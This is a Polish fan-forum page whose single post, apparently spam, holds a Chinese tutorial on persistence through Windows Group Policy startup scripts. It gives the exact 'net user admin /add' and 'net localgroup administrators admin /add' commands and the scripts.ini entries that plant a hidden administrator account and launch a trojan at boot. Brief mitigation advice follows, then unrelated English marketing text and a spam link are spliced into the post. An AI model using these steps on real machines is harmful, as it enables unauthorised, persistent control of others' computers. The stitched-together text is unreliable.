Szukanie zaawansowane
Home
Rejestracja
FAQ
Użytkownicy
Grupy
Galerie
Zaloguj się, by sprawdzić wiadomości
Zaloguj
Forum Strona Główna
Nasz button
Napisz odpowiedź
Użytkownik
Temat
Treść wiadomości
Emotikony
Więcej Ikon
Kolor:
Domyślny
Ciemnoczerwony
Czerwony
Pomarańćzowy
Brązowy
Żółty
Zielony
Oliwkowy
Błękitny
Niebieski
Ciemnoniebieski
Purpurowy
Fioletowy
Biały
Czarny
Rozmiar:
Minimalny
Mały
Normalny
Duży
Ogromny
Zamknij Tagi
Opcje
HTML:
NIE
BBCode
:
TAK
Uśmieszki:
TAK
Wyłącz BBCode w tym poście
Wyłącz Uśmieszki w tym poście
Kod potwierdzający: *
Do góry
Skocz do:
Wybierz forum
FORUM
----------------
Regulamin
Informacje/Ogłoszenia
Pomoc
Propozycje
Zarejestruj sie
Kontakt
Przedstaw się
ZESPÓŁ
----------------
Skład
Newsy
Piosenki
Teksty piosenek
O zespole
Nagrody
Zdjęcia
Video
Zloty
Media
Chat
Koncerty
Archiwum
MODA I URODA
----------------
Zdrowie, diety, odchudzanie
Fryzury i pielęgnacja włosów
Tatuaże i piercing
INNE
----------------
Fani
Hydepark
Nasze zdjecia
Ogłoszenia
Zaproszenia
C-box
Nasz button
Reklama
Wrzuć fotkę na serwer!
Przegląd tematu
<table border="0" cellpadding="0" cellspacing="0" width="100%" class="forumline"> <tr> <td class="cat" width="22%">Autor</td> <td class="cat">Wiadomość</td> </tr> <tr> <td width="22%" align="left" valign="top" class="row1"><span class="name"><a name=""></a><b>ghdhair100</b></span></td> <td class="row1" height="28" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="100%"><img src="http://picsrv.fora.pl/Avalanche/images/icon_minipost.gif" width="12" height="9" alt="Post" title="Post" border="0" /><span class="postdetails">Wysłany: Sob 8:35, 12 Mar 2011<span class="gen"> </span> Temat postu: &#21551;&#21160;&#21518;&#38376;&#30340;</span></td> </tr> <tr> <td colspan="2"><hr /></td> </tr> <tr> <td colspan="2"><span class="postbody">组策略启动脚本; <br />利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) ) <br />启动与关机相关设置; <br />选择启动->属性->添加 会弹出选择脚本名 <br />选择程序 C:\windows\system32\net.exe 参数 user admin /add 来执行 net user admin /add <br />再同样添加C:\Windows\system32\net.exe localgroup administrators admin /add <br />来执行 net localgroup administrators admin /add <br />{ .老鸟跑出来say:TMD这都是费话,net user早懂了 砰的一声 (PS:我脑袋被拍个包来了) } <br />费话少说: 在经过进一步了解的时候发现这里是由 <br />C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini <br />(PS:默认是隐藏的.) 来控制 shutdown 和 Startup 的. <br />ini组成方式如下 <br />------------------------------ <br />[Startup] <br />0CmdLine=C:\WINDOWS\system32\net.exe <br />0Parameters=user admin /add <br />1CmdLine=C:\WINDOWS\system32\net.exe <br />1Parameters=localgroup administrators admin /add <br />[Shutdown] <br />0CmdLine=1.bat <br />0Parameters= <br />[startup] \\代表是启动 <br />0CmdLine=C:\WINDOWS\system32\net.exe \\脚本名 <br />0Parameters=user admin /add \\脚本参数 <br />1CmdLine=C:\WINDOWS\system32\net.exe \\第二条脚本名 <br />1Parameters=localgroup administrators admin /add \\第二条脚本参数 <br />[Shutdown] \\关闭 (。。我再来一句,倒塌.还没说完又被砖给拍了下.) <br />0CmdLine=1.bat \\脚本名 1.bat 目录队应于 C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup <br />0Parameters= \\参数 <br />------------------------------ <br />也就是说 scripts.ini 控制着整个启动. 就如同以前 win.ini 一样 <br />C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 启动文件的目录,那样脚本名路径就可以不用加详细目录名了. <br />C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 关闭文件目录, 同上. <br />思路就这样. copy 后门到非常隐藏的目录 再加个启动脚本参数 实现木马启动. <br />解决此缺陷的方法: 组策略->计算机配置->管理模板->系统->脚本 相应的禁止就行了. <br />或者来招毒的 彻底禁止掉这个: 把scripts.ini 对应用户权限全部删除 system administrators 全部取消. 就没人能访问了. <br />以上在 Windows XP SP2 均已测试成功; 文章写得菜. 希望大虾们修正.The secondary purpose is to show you how much traffic 038; visibility your articles are attracting for you.Some questions for you:How would you like to see these email reports improved?What additional information should we include in them?Is monthly the right frequency to send them or would like them more or less frequently?Does this email service lead you to really write and submit more articles or not so much?Would you like to see total # of clicks delivered to your website? <br /> <br /> <br /> <a href="http://www.bangbangcard.com/home/space.php?uid=8308&do=blog&id=928974" target="_blank" class="postlink">你懂,我就嫁给你</a></span></td> </tr> </table></td> </tr> <tr> <td colspan="2" height="1" class="spaceRow"><img src="http://picsrv.fora.pl/Avalanche/images/spacer.gif" alt="" width="1" height="1" /></td> </tr> </table>
fora.pl
- załóż własne forum dyskusyjne za darmo
Powered by
phpBB
© 2001, 2002 phpBB Group
Avalanche style by
What Is Real
© 2004
Regulamin